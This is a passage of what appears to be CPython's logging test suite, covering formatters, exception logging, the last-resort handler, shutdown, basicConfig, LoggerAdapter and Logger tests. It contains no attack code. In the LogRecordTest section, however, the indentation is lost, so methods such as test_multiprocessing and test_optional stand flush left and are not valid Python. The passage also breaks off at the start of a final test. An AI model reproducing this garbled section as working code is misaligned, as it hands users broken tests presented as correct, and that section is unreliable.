class BufferingFormatterTest(unittest.TestCase):
    """Tests for logging.BufferingFormatter."""

    def setUp(self):
        self.records = [
            logging.makeLogRecord({'msg': 'one'}),
            logging.makeLogRecord({'msg': 'two'}),
        ]

    def test_default(self):
        # default line formatter just renders each message, no header/footer
        formatter = logging.BufferingFormatter()
        self.assertEqual('', formatter.format([]))
        self.assertEqual('onetwo', formatter.format(self.records))

    def test_custom(self):
        # subclass header/footer wrap the batch; a custom line formatter
        # is applied per record
        formatter = TestBufferingFormatter()
        self.assertEqual('[(2)onetwo(2)]', formatter.format(self.records))
        line_formatter = logging.Formatter('<%(message)s>')
        formatter = TestBufferingFormatter(line_formatter)
        self.assertEqual('[(2)<one><two>(2)]', formatter.format(self.records))
class ExceptionTest(BaseTest):
    def test_formatting(self):
        # logging.exception() must capture the active traceback (exc_text)
        # and, with stack_info=True, the call stack (stack_info).
        r = self.root_logger
        h = RecordingHandler()
        r.addHandler(h)
        try:
            raise RuntimeError('deliberate mistake')
        except:
            # bare except is deliberate: log whatever was just raised
            logging.exception('failed', stack_info=True)
        r.removeHandler(h)
        h.close()
        r = h.records[0]
        self.assertTrue(r.exc_text.startswith('Traceback (most recent '
                                              'call last):\n'))
        self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
                                            'deliberate mistake'))
        self.assertTrue(r.stack_info.startswith('Stack (most recent '
                                                'call last):\n'))
        # the stack trace should end at the logging call itself
        self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
                                              'stack_info=True)'))
class LastResortTest(BaseTest):
    def test_last_resort(self):
        # Test the last resort handler: with no handlers configured,
        # WARNING and above go to stderr via logging.lastResort.
        root = self.root_logger
        root.removeHandler(self.root_hdlr)
        old_lastresort = logging.lastResort
        old_raise_exceptions = logging.raiseExceptions

        try:
            with support.captured_stderr() as stderr:
                root.debug('This should not appear')
                self.assertEqual(stderr.getvalue(), '')
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), 'Final chance!\n')

            # No handlers and no last resort, so 'No handlers' message
            logging.lastResort = None
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                msg = 'No handlers could be found for logger "root"\n'
                self.assertEqual(stderr.getvalue(), msg)

            # 'No handlers' message only printed once
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')

            # If raiseExceptions is False, no message is printed
            root.manager.emittedNoHandlerWarning = False
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')
        finally:
            # restore global logging state regardless of outcome
            root.addHandler(self.root_hdlr)
            logging.lastResort = old_lastresort
            logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
    """Stand-in handler whose lifecycle methods record their invocation
    as '<identifier> - <method>' strings in the shared `called` list."""

    def __init__(self, identifier, called):
        for method in ('acquire', 'flush', 'close', 'release'):
            setattr(self, method, self.record_call(identifier, method, called))

    def record_call(self, identifier, method_name, called):
        """Return a no-arg closure that appends an invocation marker."""
        def inner():
            called.append(f'{identifier} - {method_name}')
        return inner
class RecordingHandler(logging.NullHandler):
    """NullHandler that remembers every record passed to handle()."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.records = []

    def handle(self, record):
        """Keep track of all the emitted records."""
        self.records.append(record)
class ShutdownTest(BaseTest):

    """Test suite for the shutdown method."""

    def setUp(self):
        super(ShutdownTest, self).setUp()
        self.called = []

        raise_exceptions = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)

    def raise_error(self, error):
        # Return a no-arg callable raising `error` — used to replace one of
        # a FakeHandler's lifecycle methods.
        def inner():
            raise error()
        return inner

    def test_no_failure(self):
        # create some fake handlers
        handler0 = FakeHandler(0, self.called)
        handler1 = FakeHandler(1, self.called)
        handler2 = FakeHandler(2, self.called)

        # create live weakref to those handlers
        # (logging.shutdown expects weak references, and processes the
        #  handler list in reverse order; logging re-exports weakref)
        handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
        logging.shutdown(handlerList=list(handlers))

        expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
                    '1 - acquire', '1 - flush', '1 - close', '1 - release',
                    '0 - acquire', '0 - flush', '0 - close', '0 - release']
        self.assertEqual(expected, self.called)

    def _test_with_failure_in_method(self, method, error):
        handler = FakeHandler(0, self.called)
        setattr(handler, method, self.raise_error(error))
        handlers = [logging.weakref.ref(handler)]

        logging.shutdown(handlerList=list(handlers))

        # release must run even when an earlier step raised
        self.assertEqual('0 - release', self.called[-1])

    def test_with_ioerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', OSError)

    def test_with_ioerror_in_flush(self):
        self._test_with_failure_in_method('flush', OSError)

    def test_with_ioerror_in_close(self):
        self._test_with_failure_in_method('close', OSError)

    def test_with_valueerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', ValueError)

    def test_with_valueerror_in_flush(self):
        self._test_with_failure_in_method('flush', ValueError)

    def test_with_valueerror_in_close(self):
        self._test_with_failure_in_method('close', ValueError)

    def test_with_other_error_in_acquire_without_raise(self):
        # with raiseExceptions off, unexpected errors are swallowed too
        logging.raiseExceptions = False
        self._test_with_failure_in_method('acquire', IndexError)

    def test_with_other_error_in_flush_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('flush', IndexError)

    def test_with_other_error_in_close_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('close', IndexError)

    def test_with_other_error_in_acquire_with_raise(self):
        # with raiseExceptions on, only OSError/ValueError are swallowed
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'acquire', IndexError)

    def test_with_other_error_in_flush_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'flush', IndexError)

    def test_with_other_error_in_close_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'close', IndexError)
class ModuleLevelMiscTest(BaseTest):

    """Test suite for some module level methods."""

    def test_disable(self):
        old_disable = logging.root.manager.disable
        # confirm our assumptions are correct
        self.assertEqual(old_disable, 0)
        self.addCleanup(logging.disable, old_disable)

        logging.disable(83)
        self.assertEqual(logging.root.manager.disable, 83)

        self.assertRaises(ValueError, logging.disable, "doesnotexists")

        class _NotAnIntOrString:
            pass

        self.assertRaises(TypeError, logging.disable, _NotAnIntOrString())

        logging.disable("WARN")

        # test the default value introduced in 3.7
        # (Issue #28524)
        logging.disable()
        self.assertEqual(logging.root.manager.disable, logging.CRITICAL)

    def _test_log(self, method, level=None):
        # Call the module-level convenience function `method`, check the
        # record it produces, and verify basicConfig() was NOT invoked
        # (the root logger already has a handler).
        called = []
        support.patch(self, logging, 'basicConfig',
                      lambda *a, **kw: called.append((a, kw)))

        recording = RecordingHandler()
        logging.root.addHandler(recording)

        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me: %r", recording)
        else:
            log_method("test me: %r", recording)

        self.assertEqual(len(recording.records), 1)
        record = recording.records[0]
        self.assertEqual(record.getMessage(), "test me: %r" % recording)

        expected_level = level if level is not None else getattr(logging, method.upper())
        self.assertEqual(record.levelno, expected_level)

        # basicConfig was not called!
        self.assertEqual(called, [])

    def test_log(self):
        self._test_log('log', logging.ERROR)

    def test_debug(self):
        self._test_log('debug')

    def test_info(self):
        self._test_log('info')

    def test_warning(self):
        self._test_log('warning')

    def test_error(self):
        self._test_log('error')

    def test_critical(self):
        self._test_log('critical')

    def test_set_logger_class(self):
        # setLoggerClass requires a Logger subclass and is then reflected
        # by getLoggerClass()
        self.assertRaises(TypeError, logging.setLoggerClass, object)

        class MyLogger(logging.Logger):
            pass

        logging.setLoggerClass(MyLogger)
        self.assertEqual(logging.getLoggerClass(), MyLogger)

        logging.setLoggerClass(logging.Logger)
        self.assertEqual(logging.getLoggerClass(), logging.Logger)

    def test_subclass_logger_cache(self):
        # bpo-37258: a subclass logger obtained from getLogger() must be
        # initialized exactly once and behave like a normal logger.
        message = []

        class MyLogger(logging.getLoggerClass()):
            def __init__(self, name='MyLogger', level=logging.NOTSET):
                super().__init__(name, level)
                message.append('initialized')

        logging.setLoggerClass(MyLogger)
        logger = logging.getLogger('just_some_logger')
        self.assertEqual(message, ['initialized'])
        stream = io.StringIO()
        h = logging.StreamHandler(stream)
        logger.addHandler(h)
        try:
            logger.setLevel(logging.DEBUG)
            logger.debug("hello")
            self.assertEqual(stream.getvalue().strip(), "hello")

            stream.truncate(0)
            stream.seek(0)

            logger.setLevel(logging.INFO)
            logger.debug("hello")
            self.assertEqual(stream.getvalue(), "")
        finally:
            logger.removeHandler(h)
            h.close()
            logging.setLoggerClass(logging.Logger)

    def test_logging_at_shutdown(self):
        # bpo-20037: Doing text I/O late at interpreter shutdown must not crash
        code = textwrap.dedent("""
            import logging

            class A:
                def __del__(self):
                    try:
                        raise ValueError("some error")
                    except Exception:
                        logging.exception("exception in __del__")

            a = A()
            """)
        rc, out, err = assert_python_ok("-c", code)
        err = err.decode()
        self.assertIn("exception in __del__", err)
        self.assertIn("ValueError: some error", err)

    def test_logging_at_shutdown_open(self):
        # bpo-26789: FileHandler keeps a reference to the builtin open()
        # function to be able to open or reopen the file during Python
        # finalization.
        filename = os_helper.TESTFN
        self.addCleanup(os_helper.unlink, filename)

        code = textwrap.dedent(f"""
            import builtins
            import logging

            class A:
                def __del__(self):
                    logging.error("log in __del__")

            # basicConfig() opens the file, but logging.shutdown() closes
            # it at Python exit. When A.__del__() is called,
            # FileHandler._open() must be called again to re-open the file.
            logging.basicConfig(filename={filename!r}, encoding="utf-8")

            a = A()

            # Simulate the Python finalization which removes the builtin
            # open() function.
            del builtins.open
            """)
        assert_python_ok("-c", code)

        with open(filename, encoding="utf-8") as fp:
            self.assertEqual(fp.read().rstrip(), "ERROR:root:log in __del__")

    def test_recursion_error(self):
        # Issue 36272: stack overflow inside logging must not crash the
        # interpreter, only raise RecursionError in the subprocess.
        code = textwrap.dedent("""
            import logging

            def rec():
                logging.error("foo")
                rec()

            rec()
            """)
        rc, out, err = assert_python_failure("-c", code)
        err = err.decode()
        self.assertNotIn("Cannot recover from stack overflow.", err)
        self.assertEqual(rc, 1)

    def test_get_level_names_mapping(self):
        mapping = logging.getLevelNamesMapping()
        self.assertEqual(logging._nameToLevel, mapping)  # value is equivalent
        self.assertIsNot(logging._nameToLevel, mapping)  # but not the internal data
        new_mapping = logging.getLevelNamesMapping()     # another call -> another copy
        self.assertIsNot(mapping, new_mapping)           # verify not the same object as before
        self.assertEqual(mapping, new_mapping)           # but equivalent in value
class LogRecordTest(BaseTest):
def test_str_rep(self):
    """str() of a LogRecord looks like '<LogRecord: ...>'."""
    text = str(logging.makeLogRecord({}))
    self.assertTrue(text.startswith('<LogRecord: '))
    self.assertTrue(text.endswith('>'))
def test_dict_arg(self):
    # A single mapping argument is kept as-is in record.args and used for
    # %(name)s substitution in the message.
    h = RecordingHandler()
    r = logging.getLogger()
    r.addHandler(h)
    d = {'less' : 'more' }
    logging.warning('less is %(less)s', d)
    self.assertIs(h.records[0].args, d)
    self.assertEqual(h.records[0].message, 'less is more')
    r.removeHandler(h)
    h.close()
@staticmethod # pickled as target of child process in the following test
def _extract_logrecord_process_name(key, logMultiprocessing, conn=None):
prev_logMultiprocessing = logging.logMultiprocessing
logging.logMultiprocessing = logMultiprocessing
try:
import multiprocessing as mp
name = mp.current_process().name
r1 = logging.makeLogRecord({'msg': f'msg1_{key}'})
# https://bugs.python.org/issue45128
with support.swap_item(sys.modules, 'multiprocessing', None):
r2 = logging.makeLogRecord({'msg': f'msg2_{key}'})
results = {'processName' : name,
'r1.processName': r1.processName,
'r2.processName': r2.processName,
}
finally:
logging.logMultiprocessing = prev_logMultiprocessing
if conn:
conn.send(results)
else:
return results
def test_multiprocessing(self):
support.skip_if_broken_multiprocessing_synchronize()
multiprocessing_imported = 'multiprocessing' in sys.modules
try:
# logMultiprocessing is True by default
self.assertEqual(logging.logMultiprocessing, True)
LOG_MULTI_PROCESSING = True
# When logMultiprocessing == True:
# In the main process processName = 'MainProcess'
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
results = self._extract_logrecord_process_name(1, LOG_MULTI_PROCESSING)
self.assertEqual('MainProcess', results['processName'])
self.assertEqual('MainProcess', results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
# In other processes, processName is correct when multiprocessing in imported,
# but it is (incorrectly) defaulted to 'MainProcess' otherwise (bpo-38762).
import multiprocessing
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(
target=self._extract_logrecord_process_name,
args=(2, LOG_MULTI_PROCESSING, child_conn,)
)
p.start()
results = parent_conn.recv()
self.assertNotEqual('MainProcess', results['processName'])
self.assertEqual(results['processName'], results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
p.join()
finally:
if multiprocessing_imported:
import multiprocessing
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):

    """Test suite for logging.basicConfig."""

    def setUp(self):
        super(BasicConfigTest, self).setUp()
        # Save the global handler bookkeeping so cleanup() can restore it;
        # each test starts with an empty root handler list.
        self.handlers = logging.root.handlers
        self.saved_handlers = logging._handlers.copy()
        self.saved_handler_list = logging._handlerList[:]
        self.original_logging_level = logging.root.level
        self.addCleanup(self.cleanup)
        logging.root.handlers = []

    def tearDown(self):
        # Close any handler a test installed on the root logger.
        for h in logging.root.handlers[:]:
            logging.root.removeHandler(h)
            h.close()
        super(BasicConfigTest, self).tearDown()

    def cleanup(self):
        # Restore the module-level state captured in setUp().
        setattr(logging.root, 'handlers', self.handlers)
        logging._handlers.clear()
        logging._handlers.update(self.saved_handlers)
        logging._handlerList[:] = self.saved_handler_list
        logging.root.setLevel(self.original_logging_level)

    def test_no_kwargs(self):
        logging.basicConfig()
        # handler defaults to a StreamHandler to sys.stderr
        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, sys.stderr)
        formatter = handler.formatter
        # format defaults to logging.BASIC_FORMAT
        self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
        # datefmt defaults to None
        self.assertIsNone(formatter.datefmt)
        # style defaults to %
        self.assertIsInstance(formatter._style, logging.PercentStyle)
        # level is not explicitly set
        self.assertEqual(logging.root.level, self.original_logging_level)

    def test_strformatstyle(self):
        # style="{" selects str.format()-style format strings.
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="{")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")

    def test_stringtemplatestyle(self):
        # style="$" selects string.Template-style format strings.
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="$")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")

    def test_filename(self):

        def cleanup(h1, h2, fn):
            h1.close()
            h2.close()
            os.remove(fn)

        # filename= makes basicConfig install a FileHandler opened in
        # append mode by default.
        logging.basicConfig(filename='test.log', encoding='utf-8')

        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.FileHandler)

        expected = logging.FileHandler('test.log', 'a', encoding='utf-8')
        self.assertEqual(handler.stream.mode, expected.stream.mode)
        self.assertEqual(handler.stream.name, expected.stream.name)
        self.addCleanup(cleanup, handler, expected, 'test.log')

    def test_filemode(self):

        def cleanup(h1, h2, fn):
            h1.close()
            h2.close()
            os.remove(fn)

        # filemode= is passed through as the FileHandler open mode.
        logging.basicConfig(filename='test.log', filemode='wb')

        handler = logging.root.handlers[0]
        expected = logging.FileHandler('test.log', 'wb')
        self.assertEqual(handler.stream.mode, expected.stream.mode)
        self.addCleanup(cleanup, handler, expected, 'test.log')

    def test_stream(self):
        # stream= makes basicConfig install a StreamHandler on that stream.
        stream = io.StringIO()
        self.addCleanup(stream.close)
        logging.basicConfig(stream=stream)

        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, stream)

    def test_format(self):
        # format= is used verbatim for the handler's formatter.
        logging.basicConfig(format='%(asctime)s - %(message)s')

        formatter = logging.root.handlers[0].formatter
        self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')

    def test_datefmt(self):
        logging.basicConfig(datefmt='bar')

        formatter = logging.root.handlers[0].formatter
        self.assertEqual(formatter.datefmt, 'bar')

    def test_style(self):
        logging.basicConfig(style='$')

        formatter = logging.root.handlers[0].formatter
        self.assertIsInstance(formatter._style, logging.StringTemplateStyle)

    def test_level(self):
        old_level = logging.root.level
        self.addCleanup(logging.root.setLevel, old_level)

        logging.basicConfig(level=57)
        self.assertEqual(logging.root.level, 57)
        # Test that second call has no effect
        logging.basicConfig(level=58)
        self.assertEqual(logging.root.level, 57)

    def test_incompatible(self):
        # filename/stream/handlers are mutually exclusive.
        assertRaises = self.assertRaises
        handlers = [logging.StreamHandler()]
        stream = sys.stderr
        assertRaises(ValueError, logging.basicConfig, filename='test.log',
                     stream=stream)
        assertRaises(ValueError, logging.basicConfig, filename='test.log',
                     handlers=handlers)
        assertRaises(ValueError, logging.basicConfig, stream=stream,
                     handlers=handlers)
        # Issue 23207: test for invalid kwargs
        assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
        # Should pop both filename and filemode even if filename is None
        logging.basicConfig(filename=None, filemode='a')

    def test_handlers(self):
        # handlers= installs the given handlers; those without a formatter
        # get the default one, which they then share.
        handlers = [
            logging.StreamHandler(),
            logging.StreamHandler(sys.stdout),
            logging.StreamHandler(),
        ]
        f = logging.Formatter()
        handlers[2].setFormatter(f)
        logging.basicConfig(handlers=handlers)
        self.assertIs(handlers[0], logging.root.handlers[0])
        self.assertIs(handlers[1], logging.root.handlers[1])
        self.assertIs(handlers[2], logging.root.handlers[2])
        self.assertIsNotNone(handlers[0].formatter)
        self.assertIsNotNone(handlers[1].formatter)
        self.assertIs(handlers[2].formatter, f)
        self.assertIs(handlers[0].formatter, handlers[1].formatter)

    def test_force(self):
        # force=True removes and replaces any existing root handlers,
        # so only the second (INFO-level) configuration takes effect
        # for messages logged after it.
        old_string_io = io.StringIO()
        new_string_io = io.StringIO()
        old_handlers = [logging.StreamHandler(old_string_io)]
        new_handlers = [logging.StreamHandler(new_string_io)]
        logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
        logging.warning('warn')
        logging.info('info')
        logging.debug('debug')
        self.assertEqual(len(logging.root.handlers), 1)
        logging.basicConfig(level=logging.INFO, handlers=new_handlers,
                            force=True)
        logging.warning('warn')
        logging.info('info')
        logging.debug('debug')
        self.assertEqual(len(logging.root.handlers), 1)
        self.assertEqual(old_string_io.getvalue().strip(),
                         'WARNING:root:warn')
        self.assertEqual(new_string_io.getvalue().strip(),
                         'WARNING:root:warn\nINFO:root:info')

    def test_encoding(self):
        # encoding= is passed through to the FileHandler.
        try:
            encoding = 'utf-8'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                errors='strict',
                                format='%(message)s', level=logging.DEBUG)

            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        self.assertEqual(data,
                         'The Øresund Bridge joins Copenhagen to Malmö')

    def test_encoding_errors(self):
        # errors='ignore' silently drops unencodable characters.
        try:
            encoding = 'ascii'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                errors='ignore',
                                format='%(message)s', level=logging.DEBUG)

            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')

    def test_encoding_errors_default(self):
        # When errors= is not given it defaults to 'backslashreplace'.
        try:
            encoding = 'ascii'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                format='%(message)s', level=logging.DEBUG)

            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            self.assertEqual(handler.errors, 'backslashreplace')
            logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
                               r'Bridge joins Copenhagen to Malm\xf6')

    def test_encoding_errors_none(self):
        # Specifying None should behave as 'strict'
        try:
            encoding = 'ascii'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                errors=None,
                                format='%(message)s', level=logging.DEBUG)

            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            self.assertIsNone(handler.errors)

            message = []

            # Intercept handleError() to capture the encoding exception
            # instead of printing it to stderr.
            def dummy_handle_error(record):
                _, v, _ = sys.exc_info()
                message.append(str(v))

            handler.handleError = dummy_handle_error
            logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
            self.assertTrue(message)
            self.assertIn("'ascii' codec can't encode "
                          "character '\\xd8' in position 4:", message[0])
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        # didn't write anything due to the encoding error
        self.assertEqual(data, r'')

    def _test_log(self, method, level=None):
        # logging.root has no handlers so basicConfig should be called
        called = []

        old_basic_config = logging.basicConfig
        def my_basic_config(*a, **kw):
            # Run the real basicConfig, then raise the level so the test
            # message does not actually reach stderr; record the call.
            old_basic_config()
            old_level = logging.root.level
            logging.root.setLevel(100)  # avoid having messages in stderr
            self.addCleanup(logging.root.setLevel, old_level)
            called.append((a, kw))

        support.patch(self, logging, 'basicConfig', my_basic_config)

        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me")
        else:
            log_method("test me")

        # basicConfig was called with no arguments
        self.assertEqual(called, [((), {})])

    def test_log(self):
        self._test_log('log', logging.WARNING)

    def test_debug(self):
        self._test_log('debug')

    def test_info(self):
        self._test_log('info')

    def test_warning(self):
        self._test_log('warning')

    def test_error(self):
        self._test_log('error')

    def test_critical(self):
        self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
    """Tests for logging.LoggerAdapter wrapping the root logger."""

    def setUp(self):
        super(LoggerAdapterTest, self).setUp()
        old_handler_list = logging._handlerList[:]

        self.recording = RecordingHandler()
        self.logger = logging.root
        self.logger.addHandler(self.recording)
        self.addCleanup(self.logger.removeHandler, self.recording)
        self.addCleanup(self.recording.close)

        # Restore the module-level handler list after the test; cleanups
        # run in reverse order, so this happens after the handler removal.
        def cleanup():
            logging._handlerList[:] = old_handler_list

        self.addCleanup(cleanup)
        self.addCleanup(logging.shutdown)
        self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)

    def test_exception(self):
        # adapter.exception() logs at ERROR and attaches the current
        # exception's exc_info triple to the record.
        msg = 'testing exception: %r'
        exc = None
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.adapter.exception(msg, self.recording)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.ERROR)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_exception_excinfo(self):
        # An explicit exc_info= exception instance is expanded to a triple.
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e

        self.adapter.exception('exc_info test', exc_info=exc)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_critical(self):
        msg = 'critical test! %r'
        self.adapter.critical(msg, self.recording)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.CRITICAL)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))

    def test_is_enabled_for(self):
        # The adapter defers to the underlying logger's manager.disable.
        old_disable = self.adapter.logger.manager.disable
        self.adapter.logger.manager.disable = 33
        self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
                        old_disable)
        self.assertFalse(self.adapter.isEnabledFor(32))

    def test_has_handlers(self):
        # hasHandlers() on the adapter tracks the wrapped logger.
        self.assertTrue(self.adapter.hasHandlers())

        for handler in self.logger.handlers:
            self.logger.removeHandler(handler)

        self.assertFalse(self.logger.hasHandlers())
        self.assertFalse(self.adapter.hasHandlers())

    def test_nested(self):
        # An adapter may wrap another adapter; process() is applied
        # outermost-first, and the manager attribute is proxied all the
        # way down to the underlying logger.
        class Adapter(logging.LoggerAdapter):
            prefix = 'Adapter'

            def process(self, msg, kwargs):
                return f"{self.prefix} {msg}", kwargs

        msg = 'Adapters can be nested, yo.'
        adapter = Adapter(logger=self.logger, extra=None)
        adapter_adapter = Adapter(logger=adapter, extra=None)
        adapter_adapter.prefix = 'AdapterAdapter'
        self.assertEqual(repr(adapter), repr(adapter_adapter))
        adapter_adapter.log(logging.CRITICAL, msg, self.recording)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.CRITICAL)
        self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
        self.assertEqual(record.args, (self.recording,))
        orig_manager = adapter_adapter.manager
        self.assertIs(adapter.manager, orig_manager)
        self.assertIs(self.logger.manager, orig_manager)
        temp_manager = object()
        try:
            # Setting the manager on the outer adapter must propagate to
            # the inner adapter and the logger itself.
            adapter_adapter.manager = temp_manager
            self.assertIs(adapter_adapter.manager, temp_manager)
            self.assertIs(adapter.manager, temp_manager)
            self.assertIs(self.logger.manager, temp_manager)
        finally:
            adapter_adapter.manager = orig_manager
            self.assertIs(adapter_adapter.manager, orig_manager)
            self.assertIs(adapter.manager, orig_manager)
            self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest, AssertErrorMessage):
    """Tests for the Logger class itself (levels, caching, pickling...)."""

    def setUp(self):
        super(LoggerTest, self).setUp()
        self.recording = RecordingHandler()
        self.logger = logging.Logger(name='blah')
        self.logger.addHandler(self.recording)
        self.addCleanup(self.logger.removeHandler, self.recording)
        self.addCleanup(self.recording.close)
        self.addCleanup(logging.shutdown)

    def test_set_invalid_level(self):
        self.assert_error_message(
            TypeError, 'Level not an integer or a valid string: None',
            self.logger.setLevel, None)
        self.assert_error_message(
            TypeError, 'Level not an integer or a valid string: (0, 0)',
            self.logger.setLevel, (0, 0))

    def test_exception(self):
        # logger.exception() logs at ERROR with the active exc_info.
        msg = 'testing exception: %r'
        exc = None
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.logger.exception(msg, self.recording)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.ERROR)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_log_invalid_level_with_raise(self):
        # With raiseExceptions on, a non-int level is a TypeError.
        with support.swap_attr(logging, 'raiseExceptions', True):
            self.assertRaises(TypeError, self.logger.log, '10', 'test message')

    def test_log_invalid_level_no_raise(self):
        with support.swap_attr(logging, 'raiseExceptions', False):
            self.logger.log('10', 'test message')  # no exception happens

    def test_find_caller_with_stack_info(self):
        # stack_info=True makes findCaller capture a formatted stack.
        called = []
        support.patch(self, logging.traceback, 'print_stack',
                      lambda f, file: called.append(file.getvalue()))

        self.logger.findCaller(stack_info=True)

        self.assertEqual(len(called), 1)
        self.assertEqual('Stack (most recent call last):\n', called[0])

    def test_find_caller_with_stacklevel(self):
        # Each increment of stacklevel attributes the record one frame
        # further up the call chain: innermost -> inner -> outer -> test.
        the_level = 1

        def innermost():
            self.logger.warning('test', stacklevel=the_level)

        def inner():
            innermost()

        def outer():
            inner()

        records = self.recording.records
        outer()
        self.assertEqual(records[-1].funcName, 'innermost')
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'inner')
        self.assertGreater(records[-1].lineno, lineno)
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'outer')
        self.assertGreater(records[-1].lineno, lineno)
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
        self.assertGreater(records[-1].lineno, lineno)

    def test_make_record_with_extra_overwrite(self):
        # extra= must not be allowed to clobber existing record attributes.
